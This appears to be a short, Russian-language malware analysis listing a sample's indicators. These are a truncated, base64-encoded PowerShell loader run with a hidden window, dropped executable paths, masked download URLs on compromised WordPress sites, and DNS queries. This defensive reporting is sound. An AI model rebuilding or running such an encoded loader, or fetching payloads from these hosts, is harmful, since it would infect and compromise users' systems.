Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABPAGMAYQB2AHAAOAAzAD0AWwBjAGgAYQByAF0ANAAyADsAJABVADYAOQBiAGoANAAwAD0AKAAoACcAQgBuACcAKwAnAHoAYgB2ACcAKQArACcAOABsACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1524
- %TEMP%\1081352.cvr
- %HOMEPATH%\b20dyak\ovpqho4\v9ofyxp.exe
- %HOMEPATH%\b20dyak\ovpqho4\v9ofyxp.exe
- http://ne####turkiye.com/wp-admin/Sbp/
- http://www.ne####turkiye.com/wp-admin/Sbp/
- http://li###nwmina.com/wp-includes/Y/
- http://hb##nte.com/wp-content/wer/
- http://hb##nte.com/wp-admin/setup-config.php
- http://th####estudio.com/wp-admin/3D/
- http://www.th####estudio.com/wp-admin/3D/
- http://fo###dbyme.com/wp-content/3e/
- http://pa######.ripplealpha.com/data/ultimatemember/L/
- DNS ASK ne####turkiye.com
- DNS ASK li###nwmina.com
- DNS ASK hb##nte.com
- DNS ASK th####estudio.com
- DNS ASK fo###dbyme.com
- DNS ASK un#####ay.giving.agency
- DNS ASK pa######.ripplealpha.com
- DNS ASK ri###ealpha.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABPAGMAYQB2AHAAOAAzAD0AWwBjAGgAYQByAF0ANAAyADsAJABVADYAOQBiAGoANAAwAD0AKAAoACcAQgBuACcAKwAnAHoAYgB2ACcAKQArACcAOABsACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQ...' (со скрытым окном)